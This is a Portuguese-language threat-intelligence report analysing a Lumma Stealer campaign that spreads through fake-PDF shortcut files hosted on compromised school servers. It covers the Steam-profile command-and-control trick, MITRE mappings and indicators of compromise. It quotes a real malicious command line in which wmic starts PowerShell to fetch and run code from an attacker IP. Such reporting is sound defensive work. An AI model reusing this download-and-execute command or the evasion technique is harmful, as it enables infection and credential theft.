Inteligência do adversário

Lumma Stealer Chronicles: campanha temática em PDF usando a infraestrutura de instituições educacionais comprometidas

A campanha de malware Lumma Stealer está explorando instituições educacionais comprometidas para distribuir arquivos LNK maliciosos disfarçados de PDFs, visando setores como finanças, saúde, tecnologia e mídia. Uma vez executados, esses arquivos iniciam um processo de infecção furtivo em vários estágios, permitindo que os cibercriminosos roubem senhas, dados do navegador e carteiras de criptomoedas. Com técnicas sofisticadas de evasão, incluindo o uso de perfis do Steam para operações de comando e controle, essa ameaça de malware como serviço (MaaS) destaca a necessidade urgente de defesas robustas de segurança cibernética. Fique atento às táticas enganosas de phishing para proteger informações confidenciais da exploração cibernética.

February 14, 2025

min

Tabela de conteúdo

Exemplo H2

Sumário executivo

O Lumma Stealer é um malware que rouba informações oferecido por meio de uma plataforma de malware como serviço (MaaS). Ele foi projetado para roubar dados confidenciais, incluindo senhas, informações do navegador e detalhes da carteira de criptomoedas.

Este relatório detalha uma campanha de malware em andamento distribuindo o ladrão de informações Lumma Stealer. O principal vetor de infecção da campanha envolve o uso de arquivos LNK (atalho) maliciosos criados para aparecerem como documentos PDF legítimos. Esses arquivos LNK, quando executados, iniciam um processo de infecção em vários estágios, levando à implantação do Lumma Stealer na máquina da vítima. A campanha se concentra em induzir os usuários a executar arquivos maliciosos, destacando a importância da conscientização do usuário e de medidas de segurança robustas. A campanha de malware tem como alvo vários setores, incluindo Educação e Academia, Corporativo e Empresarial, Governamental e Jurídico, Saúde e Farmacêutica, Financeiro e Bancário, Engenharia e Fabricação, Tecnologia e Blockchain e Mídia e Jornalismo.

Anteriormente, publicamos dois relatórios de pesquisa aprofundados analisando a campanha Lumma Stealer, detalhando suas táticas, técnicas e procedimentos (TTPs) usados pelos agentes de ameaças para distribuir e implantar o malware.

‍

‍

Atribuição e análise

Durante um compromisso direto, o usuário é inicialmente redirecionado para um Servidor WebDAV ao visitar determinados sites, estabelecendo uma conexão sem saber. Esse redirecionamento pode desencadear um pré-visualização da janela explorer.exe, exibindo o conteúdo do servidor WebDAV, que hospeda arquivos maliciosos projetado para explorar vulnerabilidades do sistema ou entregar malware.

Na infraestrutura analisada, arquivos maliciosos foram hospedados em um Servidor WebDAV dentro do diretório aberto “http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk”, Quando um usuário clica para baixar o estrutura de taxas escolares, eles, sem saber, baixam um arquivo "pdf.lnk" malicioso, que aparece como um PDF devido ao seu ícone.

‍

*Os usuários clicam no PDF para fazer o download*

‍

O diretório continha principalmente arquivo “.lnk”, que foram transformados em armas para baixar cargas maliciosas adicionais usando “mshta.exe”, um executável legítimo da Microsoft projetado para ser executado Arquivos de aplicativos HTML da Microsoft (HTA).

Os arquivos LNK (atalho) geralmente são usados como ponto de entrada em campanhas de phishing. Ao explorar seus recursos exclusivos, os agentes de ameaças podem enganar os usuários e contornar as medidas de segurança, tornando-os ferramentas eficazes para se infiltrar em sistemas e redes.

‍

‍

O arquivo LNK executa um PowerShell comando que se conecta a um remoto servidor, acionando o próximo estágio do ataque. “C:\Windows\System32\Wbem\wmic.exe process call create “powershell iex '\ *i*\ S*3*\ m*ta.e* https://80.76.51.231/Samarik' | powershell -”

‍

‍

‍

Esses atalhos enganosos, geralmente camuflados como executáveis legítimos ou arquivos PDF, atraem usuários desavisados a clicarem, comprometendo seus sistemas ou redes.

Extraímos o script descartando a seção de sobreposição, revelando uma imagem ofuscada JavaScript código.

‍

‍

Ofuscado JavaScript código na seção de sobreposição de Samarik

‍

‍

Essa função avalia o código JavaScript armazenado na variável AeQ. O uso de eval é uma técnica comum em scripts ofuscados ou maliciosos.

‍

‍

Um script do PowerShell pode ser visto por meio do script JS ofuscado. Uma carga criptografada em AES e um procedimento para descriptografá-la no modo CBC usando uma chave de decodificação codificada estão incluídos nesse script do PowerShell. Técnicas simples de ofuscação matemática também são usadas no script.

‍

‍

As variáveis e funções normalizadas do script PowerShell mostram como a carga é baixada e executada.

‍

*Script PS descriptografado e normalizado*

‍

Os downloads finais do script PowerShell, extraem o conteúdo e executam”Kompass-4.1.2.exe” (Lumma Stealer) de https [:] //80.76.51 [.] 231/kompass-4.1.2.exe

O Lumma Stealer tenta se conectar com servidores de comando e controle (C2) para exfiltrar dados roubados após infectar um sistema. Ele tenta alcançar vários domínios de servidor C2; no entanto, esses servidores estão atualmente inacessíveis.

‍

*O malware se comunica com o c2 e a comunidade Steam*

‍

A amostra usa a conexão Steam se não conseguir acessar todos os domínios C2 que possui. Os URLs do Steam diferem dos domínios C2 porque têm técnicas de decodificação distintas e são armazenados como códigos de execução.

hxxps: //steamcommunity.com/profiles/76561199724331900

O número 76561199724331900 segue o formato de um ID Steam64, sugerindo que um cliente ou jogo Steam pode estar tentando resolver um serviço de rede. Isso indica que um dispositivo na rede está tentando resolver um nome (provavelmente relacionado a uma sessão do Steam ou servidor de jogo). O perfil foi criado em 28 de junho de 2024.

‍

‍

A camuflagem de C2 por meio de perfis do Steam é uma técnica sofisticada de evasão que abusa de uma plataforma confiável para comunicação furtiva de comando e controle.

‍

*Conta de perfil Steam “76561199724331900”*

‍

O agente da ameaça provavelmente construiu esse URL do Steam, que é uma página de perfil para uma conta do Steam. A amostra primeiro se conecta ao site, analisa a tag “actual_persona_name” para extrair cadeias de caracteres e, em seguida, usa o método de cifra Caesar para descriptografar as sequências e extrair domínios C2.

‍

‍

Com base na análise de nomes diferentes que imitam documentos PDF legítimos (por exemplo, contratos, relatórios financeiros, materiais acadêmicos e folhetos técnicos), o malware Lumma Stealer tem como alvo setores, incluindo, mas não se limitando a, Educação e Academia, Corporativo e Empresarial, Governamental e Jurídico, Saúde e Farmacêutica, Financeiro e Bancário, Engenharia e Fabricação, Tecnologia e Blockchain e Mídia e Jornalismo.

‍

Táticas e técnicas do MITRE ATT&CK:

Tactic	Technique
Execution (TA0002)	T1059 – Command and Scripting Interpreter: PowerShell
	T1204.002 – User Execution: Malicious File
	T1047 – Windows Management Instrumentation (WMI)
Persistence (TA0003)	T1547.001 – Registry Run Keys / Startup Folder
Privilege Escalation (TA0004)	T1218.011 – System Binary Proxy Execution: Rundll32
Defense Evasion (TA0005)	T1027 – Obfuscated Files or Information
	T1036.003 – Masquerading: Rename System Utilities
	T1564.003 – Hide Artifacts: Hidden Window
Credential Access (TA0006)	T1012 – Query Registry
Discovery (TA0007)	T1082 – System Information Discovery
Lateral Movement (TA0008)	T1021.002 – Remote Services: SMB/Windows Admin Shares
Collection (TA0009)	T1114 – Email Collection
	T1560 – Archive Collected Data
Command and Control (TA0011)	T1071 – Application Layer Protocol
Exfiltration (TA0010)	T1041 – Exfiltration Over C2 Channel
Impact (TA0040)	T1489 – Service Stop
	T1490 – Inhibit System Recovery

‍

Indicadores de compromisso (IOCs):

Hash's (sha256)	File
BB2E14BB962873722F1FD132FF66C4AFD2F7DC9B6891C746D697443C0007426A	pdf.lnk
e15c6ecb32402f981c06f3d8c48f7e3a5a36d0810aa8c2fb8da0be053b95a8e2	Kompass-4.1.2.exe (Lumma stealer)
40b80287ba2af16daaf8e74a9465a0b876ab39f68c7ba6405cfcb41601eeec15	Samarik

URL	Category
tripeggyun.fun	Domain
processhol.sbs	Domain
librari-night.sbs	Domain
befall-sm0ker.sbs	Domain
p10tgrace.sbs	Domain
peepburry828.sbs	Domain
owner-vacat10n.sbs	Domain
3xp3cts1aim.sbs	Domain
p3ar11fter.sbs	Domain
smiteattacker.org	Decrypted Steam C2 Domains
yuriy-gagarin.com	Decrypted Steam C2 Domains
vladimir-ulyanov.com	Decrypted Steam C2 Domains
nikolay-romanov.su	Decrypted Steam C2 Domains
aleksandr-block.com	Decrypted Steam C2 Domains
misha-lomonosov.com	Decrypted Steam C2 Domains
sputnik-1985.com	Decrypted Steam C2 Domains
lev-tolstoi.com	Decrypted Steam C2 Domains
https[:]//80.76.51.231/Kompass-4.1.2.exe	Remote C2 URL
https[:]//80.76.51.231/Samarik	Remote C2 URL
http[:]//87.120.115.240/Downloads/254-zebar-school-for-children-that-tej-pro-order-abad-rural.pdf.lnk	WebDAV Servers (Lnk hosted)

IPv4	Category
87.120.115.240	IP
80.76.51.231	IP

‍

Referências

Mayank Sahariya

Passionate about national security, the author investigates organized cybercrime, analyzes malware, and explores dark web ecosystems. With a focus on cybersecurity and fintech, his work supports law enforcement, intelligence agencies, and organizations in mitigating emerging threats.

Nenhum item encontrado.